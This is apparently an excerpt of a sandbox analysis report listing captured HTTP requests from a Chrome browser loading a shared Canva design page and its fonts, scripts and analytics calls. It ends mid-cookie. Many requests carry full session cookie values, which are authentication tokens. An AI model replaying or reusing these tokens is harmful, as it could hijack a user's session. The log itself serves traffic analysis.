    Source: global trafficHTTP traffic detected: GET /web/images/b46630e470f4040eba7033cf2435edce.woff HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.canva.com/web/19jbs9.2447b447994aff36.ltr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_fb/s/41d36c36b634199c0ebf5e807fda38d0.css HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /web/18db09b659c42845.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/f919d823e68691c3.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/dd1f23ecb46acb13.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/43ddbdb7757e7317.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/0cda863f2baa0d46.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-RegularItalic16711881996774813.8dbae49e1280328b442be6dfff163124.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-Regular15263162195051178836.f4.f4a4890561b3fddfd1fd9a1b27b6d4a4.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/32526717065b2b04.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/ae HTTP/1.1Host: www.canva.comConnection: keep-aliveX-Canva-Brand: BAAAAAAAAAAX-Canva-App: responsive_design_viewersec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Canva-Build-Sha: e404dd6X-Canva-User: UAAAAAAAAAAX-Canva-Analytics: AAQAA1dFQgAAsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Canva-Request: recordanalyticseventbatchsec-ch-ua-platform-version: "10.0.0"X-Canva-Locale: enX-Canva-Build-Name: 20241217-21sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /web/f0398d1166314304.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /web/dd1f23ecb46acb13.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/18db09b659c42845.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-BoldItalic12646845404018590449.625cf32ea46ae48b58ebd3ff993de469.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-Bold13644182954117137290.33696.33696a29f45c1b554a4c12443b998d21.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-MediumItalic.2114be9bf82cd092e.e5e43f51d6d7939d8911c861efa5f9b7.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /YAFdJjTk5UU/0/CanvaSans-Medium.95291d1cd5c6185e00ba590.c69c23593c9bd5705c7780a200f2a6db.woff2 HTTP/1.1Host: font-public.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/43ddbdb7757e7317.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /_ajax/csrf3/ae HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js? HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
    Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; 